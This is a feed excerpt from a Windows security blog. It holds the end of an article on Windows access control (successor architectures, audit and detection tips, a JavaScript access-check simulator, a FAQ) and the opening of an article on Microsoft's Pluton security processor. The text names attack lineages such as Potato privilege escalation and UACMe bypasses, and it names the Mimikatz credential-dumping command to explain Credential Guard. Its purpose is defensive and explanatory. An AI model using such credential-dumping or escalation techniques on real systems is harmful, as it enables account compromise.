&lt;p&gt;&lt;strong&gt;NTLMless.&lt;/strong&gt; Formally retires NTLM as a default Windows authentication protocol [@techcommunity-windows-auth-evolution]. The Tech Community announcement is unambiguous about direction: &quot;Reducing the use of NTLM will ultimately culminate in it being disabled in Windows 11. We are taking a data-driven approach and monitoring reductions in NTLM usage to determine when it will be safe to disable&quot; [@techcommunity-windows-auth-evolution].&lt;/p&gt;
&lt;p&gt;The transition rests on a local KDC (IAKerb) that lets Kerberos service both local and domain accounts, plus an audit channel introduced in Windows 11 24H2 and Windows Server 2025 (KB5064479, original publish date July 11, 2025) that records NTLMv1 usage in &lt;code&gt;Microsoft\Windows\NTLM\Operational&lt;/code&gt; and gives administrators per-service telemetry on which workloads still require the protocol [@ms-support-ntlm-auditing]. The local-NTLM-to-self attack class -- coerce a SYSTEM service to authenticate with the local-machine credential, accept the challenge, relay it back to a local service that trusts the credential -- ends when the local-machine NTLM credential ends. &lt;em&gt;Closes:&lt;/em&gt; limit #4. Forthcoming article in this series.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;VBS Trustlets and Isolated User Mode.&lt;/strong&gt; Shipped in Windows 10 1507 in 2015. &lt;em&gt;Virtualization-Based Security&lt;/em&gt; (VBS) uses the Hyper-V hypervisor to host a second user-mode environment, &lt;em&gt;Virtual Trust Level 1&lt;/em&gt; (VTL1), whose memory the NT kernel running in VTL0 cannot read or write. A &lt;em&gt;Trustlet&lt;/em&gt; is a process that runs in VTL1. &lt;em&gt;Closes:&lt;/em&gt; limit #1, for selected secrets. The ordinary NT kernel still runs the show for ordinary processes; VTL1 is a side-channel for secrets and policy decisions that the model wants to protect even from a kernel-level attacker. Detailed coverage in the Secure Kernel sibling article [@secure-kernel-sibling].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Credential Guard.&lt;/strong&gt; The canonical first Trustlet. &lt;code&gt;lsass.exe&lt;/code&gt; continues to run in VTL0 and answer authentication requests; the credential blobs &lt;code&gt;lsass.exe&lt;/code&gt; historically held are moved to a Trustlet called &lt;code&gt;LsaIso&lt;/code&gt; in VTL1. The VTL0 &lt;code&gt;lsass.exe&lt;/code&gt; retains &lt;em&gt;handles&lt;/em&gt; to the blobs but cannot read their contents; authentication happens by calling into the Trustlet. Mimikatz &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; returns no plaintext credentials against a Credential-Guard-on system, because the plaintext does not live in VTL0 memory at all. The default-enablement timeline and the SKU-specific configuration matrix are covered in the Secure Kernel sibling article [@secure-kernel-sibling].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pluton-rooted attestation and the hardware foundation.&lt;/strong&gt; The successor architectures rest on a hardware identity chain that begins below the firmware, in Microsoft&apos;s Pluton in-die security processor. Pluton holds the keys that vouch for the boot measurements that the OS in turn uses to attest its own integrity to a remote relying party. The &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton article&lt;/a&gt; in this series covers the architecture and the Caliptra root-of-trust direction it foreshadows [@pluton-sibling]. The &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 2.0 architecture&lt;/a&gt; that the same chain extends and the &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot chain&lt;/a&gt; that runs before the access-control model boots are covered in their own sibling articles in this series.&lt;/p&gt;

The five limits enumerated in Section 13 and the four successor articles in this section are in one-to-one correspondence: Adminless closes #2 and #3, NTLMless closes #4, VBS Trustlets close #1, and Credential Guard is the canonical first Trustlet that demonstrates #1 closing for a specific high-value secret. Limit #5 -- the DACL is local -- is operational rather than architectural and is closed by deployment investment in AD plus AD FS rather than by a new mechanism. The correspondence is not a coincidence. Each successor was scoped to close a specific gap the access-control model could not close from inside.
&lt;p&gt;With the gaps named and the successors mapped, what does an administrator actually do today?&lt;/p&gt;
&lt;h2&gt;15. Practical Guide&lt;/h2&gt;
&lt;p&gt;Six concrete recommendations for 2026, each tied to a primary Microsoft Learn or named-expert source.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;whoami /all&lt;/code&gt; prints the SIDs in the calling thread&apos;s token, the integrity level, every privilege with its &lt;code&gt;Enabled&lt;/code&gt; / &lt;code&gt;Disabled&lt;/code&gt; / &lt;code&gt;Default Enabled&lt;/code&gt; state, and -- on AD-joined machines with claims -- the user and device claim set. It is the single most useful diagnostic command for understanding what a session can do. Read the &lt;code&gt;Enabled&lt;/code&gt; column carefully: an available-but-disabled privilege does not affect any access check until the process explicitly enables it [@ms-learn-access-tokens].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;icacls &amp;lt;path&amp;gt;&lt;/code&gt; prints the DACL on a file or directory; the mass-rights letters are &lt;code&gt;(F)&lt;/code&gt; full, &lt;code&gt;(M)&lt;/code&gt; modify, &lt;code&gt;(RX)&lt;/code&gt; read and execute, &lt;code&gt;(R)&lt;/code&gt; read, &lt;code&gt;(W)&lt;/code&gt; write, &lt;code&gt;(D)&lt;/code&gt; delete, &lt;code&gt;(GA)&lt;/code&gt; generic all, &lt;code&gt;(GR)&lt;/code&gt; generic read, &lt;code&gt;(GW)&lt;/code&gt; generic write [@ms-learn-how-dacls-control-access]. PowerShell&apos;s &lt;code&gt;Get-Acl&lt;/code&gt; returns the same descriptor as a structured object that can be filtered and audited at scale. Sysinternals &lt;code&gt;accesschk.exe&lt;/code&gt; answers the inverted query (which paths grant a given SID a given right) and is the right tool for catching descriptor misconfigurations across a large file system. Treat NULL DACL and empty DACL surfaces as the most-likely misconfiguration vectors.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On every Windows server, enumerate the principals whose tokens hold &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; in their &lt;em&gt;Default&lt;/em&gt; or &lt;em&gt;Available&lt;/em&gt; lists. Treat any non-LocalSystem-or-equivalent holder as a Potato target until proven otherwise. Where a service must hold the privilege (most managed-service workloads do), constrain the blast radius with per-service SIDs and Group Managed Service Accounts so that a compromise of one service does not extend to a compromise of every service that shares the host&apos;s identity [@github-itm4n-printspoofer].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The UACMe README is the institutional memory for the seventy-method bypass canon. Every method&apos;s &lt;code&gt;Fixed in:&lt;/code&gt; field cites a specific Windows version or &lt;code&gt;unfixed&lt;/code&gt;. Before declaring a binary &quot;patched,&quot; consult the README; a method with a &lt;code&gt;Fixed in: unfixed&lt;/code&gt; annotation is structurally available on every supported Windows version. The institutional position is that UAC bypasses do not, by Microsoft&apos;s own servicing-criteria policy, earn CVEs of their own, so the mitigations are issued per-redirect rather than per-feature [@github-hfiref0x-uacme, @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Windows Event ID 4688 (&quot;A new process has been created&quot;) is the most-cited detection signal for the Potato lineage and the UAC bypass tradition, because almost every member of both families ends in a &lt;code&gt;CreateProcessAsUser&lt;/code&gt; or a redirected AutoElevate launch with a command-line argument that does not match the legitimate use of the parent binary. Enable command-line auditing under &lt;em&gt;Audit Process Creation&lt;/em&gt; and forward the log; Sysmon Event ID 1 is the equivalent and richer signal in environments that deploy Sysinternals&apos; Sysmon.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The access matrix is the part of the model with deliberately extensible &lt;em&gt;subjects&lt;/em&gt;. New code that lives behind an AppContainer SID gets a Low-IL token, a Package SID, and a capability list that constrain what it can touch even when the user running it is an administrator. New file shares that need attribute-based authorization should use conditional ACEs and Dynamic Access Control rather than ad-hoc group membership. Cross-link to the &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;App Identity sibling article&lt;/a&gt; for Package SID derivation [@app-identity-sibling] and to the Dynamic Access Control overview [@ms-learn-dac].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Inputs:
//   token       -- {sids:[...], integrity:&apos;Low&apos;|&apos;Medium&apos;|&apos;High&apos;|&apos;System&apos;,
//                   appContainer:bool, capabilities:[...], claims:{...},
//                   privileges:{enabled:[...]}}
//   descriptor  -- {dacl:[...], integrityLabel:&apos;Low&apos;|...|&apos;System&apos;,
//                   policyNoWriteUp:bool}
//   desired     -- access mask (number)
// Output: {granted, status, fired:[...]}&lt;/p&gt;
&lt;p&gt;function fullAccessCheck(token, descriptor, desired) {
  const fired = [];
  const ilOrder = {Low:1, Medium:2, High:3, System:4};&lt;/p&gt;
&lt;p&gt;  // 1. MIC check fires before DACL walk.
  if (descriptor.policyNoWriteUp) {
    const writeBits = 0x00040000 | 0x00000002 | 0x00000004; // WRITE_DAC|WRITE|APPEND
    if ((desired &amp;amp; writeBits) &amp;amp;&amp;amp; ilOrder[token.integrity] &amp;lt; ilOrder[descriptor.integrityLabel]) {
      fired.push(&apos;MIC no-write-up: token IL &apos; + token.integrity + &apos; &amp;lt; object IL &apos; + descriptor.integrityLabel);
      return {granted:0, status:&apos;DENIED at integrity check&apos;, fired};
    }
  }&lt;/p&gt;
&lt;p&gt;  // 2. Privilege bypass short-circuit.
  if (token.privileges.enabled.includes(&apos;SeBackupPrivilege&apos;) &amp;amp;&amp;amp; (desired &amp;amp; 0x80000000)) {
    fired.push(&apos;SeBackupPrivilege bypass: GENERIC_READ granted&apos;);
    return {granted: desired, status:&apos;GRANTED via SeBackupPrivilege&apos;, fired};
  }&lt;/p&gt;
&lt;p&gt;  // 3. AppContainer capability check (simplified).
  if (token.appContainer &amp;amp;&amp;amp; descriptor.requiresCapability) {
    if (!token.capabilities.includes(descriptor.requiresCapability)) {
      fired.push(&apos;AppContainer capability check: missing &apos; + descriptor.requiresCapability);
      return {granted:0, status:&apos;DENIED at AppContainer check&apos;, fired};
    }
  }&lt;/p&gt;
&lt;p&gt;  // 4. DACL walk, deny-first, in canonical order.
  let remaining = desired;
  let granted = 0;
  for (const ace of (descriptor.dacl || [])) {
    if (!token.sids.includes(ace.sid)) continue;
    if (ace.condition &amp;amp;&amp;amp; !evalCondition(ace.condition, token.claims)) continue;
    if (ace.type === &apos;DENY&apos; &amp;amp;&amp;amp; (ace.mask &amp;amp; remaining) !== 0) {
      fired.push(&apos;Conditional/plain DENY: &apos; + ace.sid);
      return {granted:0, status:&apos;DENIED at DACL&apos;, fired};
    }
    if (ace.type === &apos;ALLOW&apos;) {
      const newBits = ace.mask &amp;amp; remaining;
      granted |= newBits;
      remaining &amp;amp;= ~newBits;
      fired.push(&apos;ALLOW &apos; + ace.sid + &apos;: granted 0x&apos; + newBits.toString(16));
    }
    if (remaining === 0) {
      return {granted, status:&apos;GRANTED&apos;, fired};
    }
  }
  return {granted, status: remaining === 0 ? &apos;GRANTED&apos; : &apos;DENIED end of DACL&apos;, fired};
}&lt;/p&gt;
&lt;p&gt;function evalCondition(expr, claims) {
  // Toy evaluator for &quot;(@User.Department == \&quot;Finance\&quot;)&quot;-style expressions.
  const m = expr.match(/@User\.(\w+)\s*==\s*&quot;([^&quot;]+)&quot;/);
  if (!m) return true;
  return claims[m[1]] === m[2];
}&lt;/p&gt;
&lt;p&gt;// Demo: a Medium-IL user trying to write to a System-IL object via an allow ACE.
console.log(fullAccessCheck(
  {sids:[&apos;S-1-5-21-X-Y-Z-1001&apos;], integrity:&apos;Medium&apos;, appContainer:false, capabilities:[], claims:{Department:&apos;Finance&apos;},
   privileges:{enabled:[]}},
  {dacl:[{type:&apos;ALLOW&apos;, sid:&apos;S-1-5-21-X-Y-Z-1001&apos;, mask:0xFFFFFFFF}],
   integrityLabel:&apos;System&apos;, policyNoWriteUp:true},
  0x00040000));  // WRITE_DAC
`}&lt;/p&gt;
&lt;p&gt;The simulator runs the full plane in order: MIC integrity check, privilege bypass short-circuit, AppContainer capability check, DACL walk with conditional-ACE evaluation. Reading the &lt;code&gt;fired&lt;/code&gt; log in the output tells you which primitive made the decision and why. It is the mental model the rest of the article has been building toward.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The six tips and the simulator together close the practical loop. With them, the practitioner can reason about any specific access decision the way the kernel does -- not by remembering features, but by walking the same plane.&lt;/p&gt;
&lt;p&gt;The Sysinternals &lt;code&gt;accesschk&lt;/code&gt; and &lt;code&gt;psgetsid&lt;/code&gt; utilities have long been first-line investigative tools for ACL audits. Both ship in the Sysinternals Suite today and continue to surface the same descriptors &lt;code&gt;Get-Acl&lt;/code&gt; and &lt;code&gt;icacls&lt;/code&gt; print, in the form most useful to an administrator working at scale.&lt;/p&gt;
&lt;h2&gt;16. Frequently Asked Questions&lt;/h2&gt;


No. By Microsoft&apos;s own *Security Servicing Criteria for Windows*, UAC and admin-to-kernel are not on the enumerated security-boundary list [@msrc-servicing-criteria]; bypasses are not, by policy, eligible for security servicing as boundary violations. The seventy-plus methods catalogued in UACMe are the empirical consequence of the classification, not a long string of bugs in a feature that was meant to defend against the techniques [@github-hfiref0x-uacme].


No. `Everyone` (the well-known SID `S-1-1-0`) is just a SID. ACEs that reference it are subject to the same DACL walk as any other SID; if a deny ACE for `Everyone` precedes an allow ACE for `Authenticated Users`, access is denied. The DACL evaluation algorithm does not know `Everyone` is special. Forshaw made the point with a meme-able rant in 2020: &quot;S-1-1-0 is NOT A SECURITY BOUNDARY&quot; [@tiraniddo-sharing-logon-session].


No. *Empty* DACL denies all access. *No* DACL (a NULL DACL) grants full access. Newly-written code that &quot;creates a file with no protection&quot; almost always gets this distinction wrong [@ms-learn-how-dacls-control-access]. Verify with `Get-Acl` or `icacls` after creation; an `icacls` output of `Everyone:(F)` on an object you intended to lock down is almost always a NULL DACL, not the policy you meant to write.


For DACL alone, yes. For MIC, no -- a System-IL administrator still cannot write to a process at higher integrity if MIC denies the request, because the integrity check fires before the DACL walk [@ms-learn-mic]. For AppContainer, no -- AppContainer-bound objects require the capability SID, not just an administrator SID. For VBS Trustlets, no -- secrets in VTL1 are unreachable from VTL0 even with administrator rights, which is the whole point of the architecture [@secure-kernel-sibling].


No. The list shows *available* privileges. The `Enabled` column is the one that matters for runtime decisions; available-but-disabled privileges must be enabled via `AdjustTokenPrivileges` before any privileged operation can use them. Most privileges are disabled by default precisely so that a process must explicitly opt in to using one, which lets a security-conscious application minimise the window in which a bug can abuse the privilege [@ms-learn-privileges].


No. The underlying NTLM-to-self surface is still open. SharpEfsPotato (2021) [@github-bugch3ck-sharpefspotato] is the most recent member of the lineage; new tools using fresh coercion primitives (EFSRPC, the spooler, the schedule-task COM interface, cross-session DCOM) appear every twelve to eighteen months. Microsoft&apos;s own Hot Potato post called the underlying issue &quot;hard to fix without breaking backward compatibility&quot; [@foxglove-hot-potato-blog]; the structural fix is the Adminless and NTLMless successor articles, not a point patch on any one primitive.


Partially. AppContainer is a process-level isolation mechanism with a Low-IL token plus a capability-SID list. It is also a *named principal* in the Windows access-control model -- something Chrome&apos;s sandbox is not -- which means AppContainer-bound code can be referenced by SID in a DACL or conditional ACE, and Windows can refuse access to it as a principal in its own right. The sibling App Identity article in this series covers the Package SID derivation and the relationship to Authenticode and App Control for Business [@app-identity-sibling].

&lt;h2&gt;17. Closing: Return to the Hook&lt;/h2&gt;
&lt;p&gt;Open a Windows PowerShell window again. Run &lt;code&gt;whoami /priv&lt;/code&gt;. Read the column on the right, this time with the article&apos;s vocabulary annotated above each line.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeShutdownPrivilege&lt;/code&gt; -- a privilege, in the kernel sense of a pre-checked superpower; bookkeeping rather than power.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeIncreaseWorkingSetPrivilege&lt;/code&gt; -- the same. Most of the twenty rows are housekeeping that the kernel checks at specific call sites to gate non-security-critical operations.&lt;/p&gt;
&lt;p&gt;The five rows that matter are easy to spot once you know what to look for. &lt;code&gt;SeDebugPrivilege&lt;/code&gt; -- Mimikatz starts here. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; -- the entire Potato lineage starts here. &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; -- the second half of every token-replay attack. &lt;code&gt;SeBackupPrivilege&lt;/code&gt; -- HiveNightmare&apos;s privilege class. &lt;code&gt;SeRestorePrivilege&lt;/code&gt; -- service-binary replacement. The kernel reads the same column on every securable operation, billions of times a second, and the answer to &quot;can this code do this?&quot; is built out of this list every time.&lt;/p&gt;
&lt;p&gt;Now run &lt;code&gt;icacls C:\Windows\System32\drivers\etc\hosts&lt;/code&gt; again. &lt;code&gt;BUILTIN\Administrators:(F)&lt;/code&gt; is an allow ACE granting full control to the well-known SID &lt;code&gt;S-1-5-32-544&lt;/code&gt;. &lt;code&gt;NT AUTHORITY\SYSTEM:(F)&lt;/code&gt; is an allow ACE granting full control to &lt;code&gt;S-1-5-18&lt;/code&gt;. &lt;code&gt;BUILTIN\Users:(R)&lt;/code&gt; is an allow ACE granting &lt;code&gt;FILE_GENERIC_READ&lt;/code&gt; to &lt;code&gt;S-1-5-32-545&lt;/code&gt;. The DACL is in canonical order: explicit entries before inherited entries, deny entries (none here) before allow entries within each group. &lt;code&gt;SeAccessCheck&lt;/code&gt; will walk this DACL on every read of &lt;code&gt;hosts&lt;/code&gt; from any process on the machine, and the output will be deterministic -- the same answer every time, for the same caller -- because the model that produces it is closed and finite.&lt;/p&gt;
&lt;p&gt;The article&apos;s payoff. Every later post in this series starts where this one ends. The Adminless article retires the bearer-credential property of long-lived tokens. The NTLMless article retires the local-NTLM-to-self relay surface. The Secure Kernel article hosts secrets in VTL1 outside the NT kernel&apos;s address space and tells the Credential Guard story in detail [@secure-kernel-sibling]. The Pluton article roots the hardware identity chain that the successor architectures all eventually verify against [@pluton-sibling]. The TPM article and the Secure Boot article cover the static-time and boot-time chains that run before the access-control model even loads. Each successor was scoped to close a specific gap the access-control model could not close from inside.&lt;/p&gt;
&lt;p&gt;NT 3.1 froze a model in July 1993 because federal procurement demanded it. That model has not structurally changed in thirty-three years. The accumulated attack surface against it -- twenty-five years, eight Potatoes, seventy UAC bypasses, one Mimikatz -- is the empirical proof that &quot;frozen&quot; was always going to mean &quot;attackable from below.&quot; The next generation of defences takes that lesson and stops trying to fix the model from inside. The model is not a feature catalogue. It is a decision plane with five inputs, ten primitives, and five publicly conceded structural limits, and the four successor architectures of the next decade are the four non-overlapping ways to close those limits without re-evaluating against TCSEC C2 again.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeAccessCheck&lt;/code&gt; decides every time. The next decade decides what it decides about.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-access-control-twenty-five-years&quot; keyTerms={[
  { term: &quot;SeAccessCheck&quot;, definition: &quot;The kernel routine that decides whether a thread may perform a requested set of operations on an object. Takes a security descriptor, an access token, a desired-access mask, a generic-mapping table, and previously-granted access; returns the granted access mask plus a status code.&quot; },
  { term: &quot;Security Reference Monitor (SRM)&quot;, definition: &quot;The kernel-mode component that owns SeAccessCheck and the audit log generation routines. Every other kernel component that needs to grant or deny access calls into it.&quot; },
  { term: &quot;Access Token&quot;, definition: &quot;A kernel object that names the security identity of a thread or process. Carries the user&apos;s SID, group SIDs, privileges, integrity level, primary/impersonation flag, and (for restricted tokens) a list of restricting SIDs. The kernel consults the token on every access check.&quot; },
  { term: &quot;Discretionary Access Control List (DACL)&quot;, definition: &quot;The ordered list of allow / deny ACEs attached to a securable object. The object&apos;s owner controls the contents, in contrast to a mandatory list.&quot; },
  { term: &quot;Mandatory Integrity Control (MIC)&quot;, definition: &quot;A Vista-era addition that adds an integrity-level check to SeAccessCheck. The integrity check fires before the DACL walk and enforces no-write-up by default.&quot; },
  { term: &quot;User Account Control (UAC)&quot;, definition: &quot;A Vista-era split-token mechanism in which an administrative user receives two linked tokens at logon: a filtered Medium-IL standard-user token and a full High-IL administrative counterpart. Not, by Microsoft&apos;s own servicing criteria, an enforced security boundary.&quot; },
  { term: &quot;SeImpersonatePrivilege&quot;, definition: &quot;The privilege that lets a service accept an impersonation token from a client. Held by every Windows service account by default. The load-bearing privilege for the entire Potato lineage.&quot; },
  { term: &quot;Confused Deputy&quot;, definition: &quot;Norm Hardy&apos;s 1988 framing of the structural failure mode of any ambient-authority access-control system: a privileged service can be tricked into using its own authority on the attacker&apos;s behalf because the system cannot distinguish authority the service has from authority the service is being asked to use.&quot; },
  { term: &quot;VBS Trustlet&quot;, definition: &quot;A Windows process that runs in Virtual Trust Level 1, a hardware-isolated user-mode environment whose memory the NT kernel running in VTL0 cannot read or write. The architectural answer to the admin-equals-kernel concession of the access-control model.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>access-control</category><category>privilege-escalation</category><category>security-tokens</category><category>uac</category><category>mimikatz</category><category>potato-attacks</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Pluton: A TPM On Silicon Microsoft Can Patch</title><link>https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/</link><guid isPermaLink="true">https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/</guid><description>How Microsoft moved the TPM onto the SoC die, ran it on Rust firmware, and patched it through Windows Update -- and what that cost in trust centralisation.</description><pubDate>Sat, 09 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft Pluton is the architectural answer to a TPM threat model that broke between 2019 and 2024.** It moves the TPM onto the application SoC die, runs Microsoft-authored Rust firmware on a dedicated TEE, and ships updates through Windows Update -- closing every attack surface that defeated discrete TPM (Andzakovic 2019), Intel PTT (TPM-Fail 2019), and AMD fTPM (faulTPM 2023). Each design choice retires a 2014-2024 attack class and places a new trust in Microsoft: silicon supply chain, firmware compiler, signing key, update channel. The chip is the cheapest part of the system; the cost is a single Microsoft signing key as the trust anchor for every Pluton-equipped Windows 11 client.
&lt;h2&gt;1. The question Microsoft answered architecturally before the prior article posed it&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;&quot;The TPM was supposed to be the part of the system you didn&apos;t have to trust anyone for. Twenty-five years later, the trust question is back -- and the answer is now political.&quot;&lt;/em&gt; That was the closing line of the previous article in this series [@prior-tpm-in-windows]. The counterintuitive fact: by the time that question was asked, Microsoft had been shipping its architectural answer to it for twelve years already, inside an Xbox.&lt;/p&gt;
&lt;p&gt;The Xbox One launched in November 2013 with an on-die, Microsoft-signed security processor and a Microsoft-controlled firmware update path. Microsoft&apos;s own announcement seven years later named the lineage explicitly: &lt;em&gt;&quot;the Pluton design was introduced as part of the integrated hardware and OS security capabilities in the Xbox One console released in 2013 by Microsoft in partnership with AMD&quot;&lt;/em&gt; [@ms-pluton-blog-2020]. The November 17, 2020 announcement that Pluton would ship on Windows PCs was not the introduction of a new design. It was a decision to apply a console design pattern to the general-purpose PC, with all the political and supply-chain consequences that come with that decision.&lt;/p&gt;
&lt;p&gt;The prior article ended with three sets of broken engineering. A NZ$40 iCE40 FPGA on an LPC bus defeats discrete TPM in the time it takes a laptop to finish Trusted Boot [@andzakovic-2019-tpm-sniffing]. A network packet defeats Intel PTT through a 5-hour timing side channel against the ECDSA implementation in CSME [@tpmfail-microsite]. A few hours of physical access defeats AMD fTPM via a voltage glitch on the SVI2 power-management bus, walking out with the entire fTPM internal state [@jacob-2023-faultpm]. All three are documented in the prior article&apos;s section 5 and will not be re-derived here.&lt;/p&gt;
&lt;p&gt;This article is what those three results forced into shape. Microsoft&apos;s reply is structural: move the TPM onto the SoC die so the bus disappears; run it on a dedicated TEE so a faulTPM-class glitch cannot drop everything; rewrite the firmware in a memory-safe language so the next decade of TPM-Fail-class CVEs has somewhere shorter to live; and route updates through Windows Update so the patch latency stops being measured in OEM-capsule quarters and starts being measured in Patch Tuesday weeks. Each design choice closes a specific 2014-2024 attack class. Each design choice also names a new trust. &lt;em&gt;The bus is closed by trusting the silicon supply chain. The TEE is dedicated by trusting Microsoft&apos;s chip-level isolation. The firmware is memory-safe by trusting Microsoft&apos;s compiler and SDLC. The update path is fast by trusting Microsoft&apos;s signing key and Windows Update infrastructure.&lt;/em&gt; That is the article in five sentences.&lt;/p&gt;
&lt;p&gt;The route from here is historical, then technical, then practical. Section 2 traces the design pattern from Xbox One (2013) through Project Sopris (2015), the &lt;em&gt;Seven Properties of Highly Secure Devices&lt;/em&gt; paper (2017), Project Cerberus (2017), and Azure Sphere (2018). Section 3 shows why every other architectural option for &quot;where the TPM lives&quot; was systematically broken in public between 2019 and 2024. Section 4 walks the five generations of Microsoft security silicon side by side. Section 5 takes the four design choices in the November 17, 2020 announcement one at a time. Section 6 lists what is shipping in 2026, who has it on by default, and how to verify. Section 7 puts Pluton next to Apple&apos;s Secure Enclave Processor, Google&apos;s Titan M2 / OpenTitan, Caliptra, and the still-shipping Project Cerberus. Section 8 is what Pluton still cannot do, including the worked example of CVE-2025-2884. Section 9 is the open problems Pluton has named but not solved. Section 10 is the Monday-morning checklist. Section 11 is the FAQ and the closing.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A single design pattern -- on-die security processor, Microsoft-signed firmware, online firmware updates -- migrating across product domains for thirteen years until it lands on the general-purpose PC. That migration is the subject of this article. Its cost is the subject of its closing.&lt;/p&gt;
&lt;/blockquote&gt;

gantt
    title Microsoft on-die security silicon 2013-2025
    dateFormat YYYY-MM
    axisFormat %Y
    section Lineage
    Xbox One on-die security processor :2013-11, 2018-12
    Project Sopris (Codename 4x4) :2015-01, 2017-04
    Seven Properties paper (MSR-TR-2017-16) :2017-03, 2017-12
    Project Cerberus (OCP) :2017-11, 2025-12
    Azure Sphere (MT3620, Pluton MCU) :milestone, 2018-04, 1d
    section Pluton on PC
    November 17 2020 announcement :milestone, 2020-11, 1d
    AMD Ryzen 6000 first silicon :milestone, 2022-01, 1d
    Linux 6.3 tpm_crb merged :milestone, 2023-02, 1d
    Caliptra 1.0 (parallel path) :milestone, 2024-04, 1d
    Rust-based firmware foundation :2024-01, 2026-12
    section Stress test
    CVE-2025-2884 (TCG ref code OOB) :milestone, 2025-06, 1d
&lt;p&gt;Where did the design pattern come from, and why was it ready for the PC in 2020 and not earlier?&lt;/p&gt;
&lt;h2&gt;2. Origins -- Xbox One (2013), Sopris (2015), Seven Properties (2017), Cerberus (2017), Azure Sphere (2018)&lt;/h2&gt;
&lt;p&gt;The November 2020 announcement is retroactive. The &lt;em&gt;design&lt;/em&gt; dates to Xbox One in 2013; the &lt;em&gt;name&lt;/em&gt; &quot;Pluton&quot; first appears publicly in April 2018, in an Azure Blog post on the Azure Sphere MCU [@azure-blog-anatomy-secured-mcu]. The five-year gap is the architecture maturing from &quot;console-only thing the SoC team built&quot; to &quot;thing Microsoft Research thinks every device should have.&quot;&lt;/p&gt;
&lt;h3&gt;2013 -- Xbox One&lt;/h3&gt;
&lt;p&gt;A console adversary has full physical access, unlimited time, and an economic incentive measured in hundreds of thousands of pirated units. Microsoft and AMD co-designed the Xbox One SoC with an on-die security subsystem, Microsoft-signed firmware, and a hardware-enforced separation between the Game OS and the System OS. The 2020 Pluton announcement [@ms-pluton-blog-2020] names the lineage explicitly. The architectural shape that the Pluton-on-PC program would later put under TCG TPM 2.0 wire compatibility was already running in production at consumer-console scale by 2014. The motivation matters because it is the &lt;em&gt;only&lt;/em&gt; domain where Microsoft had hands-on experience deploying an on-die security processor against an adversary who owned the hardware. (Note: that the design was driven specifically by RGH-class console-modding adversaries is architectural inference, not a Microsoft statement.)&lt;/p&gt;
&lt;h3&gt;2015 -- Codename 4x4 / Project Sopris&lt;/h3&gt;
&lt;p&gt;In 2015, a small team in Microsoft AI+Research NExT, led by Galen Hunt, began exploring whether the same architectural shape could secure a $4 microcontroller [@msr-blog-azure-sphere]. The internal codename was &lt;em&gt;Codename 4x4&lt;/em&gt; -- a reference to the technical requirements that the chip would have at least 4 MB of RAM and 4 MB of Flash [@msr-blog-azure-sphere]. The Microsoft Research blog post is the surviving primary source on Sopris [@msr-blog-azure-sphere].The &quot;Codename 4x4&quot; name was internal team shorthand. Hunt&apos;s MSR Blog post records both the meaning and the constraint: &lt;em&gt;&quot;This was the origin of the project, internally called &apos;Codename 4x4&apos;, referring to the technical requirements that the chip will have at least 4 MB of RAM and 4 MB of Flash&quot;&lt;/em&gt; [@msr-blog-azure-sphere]. The point was not the storage budget; the point was that a $4 MCU must afford the same architectural properties as a console SoC.&lt;/p&gt;
&lt;h3&gt;March 2017 -- Seven Properties of Highly Secure Devices&lt;/h3&gt;
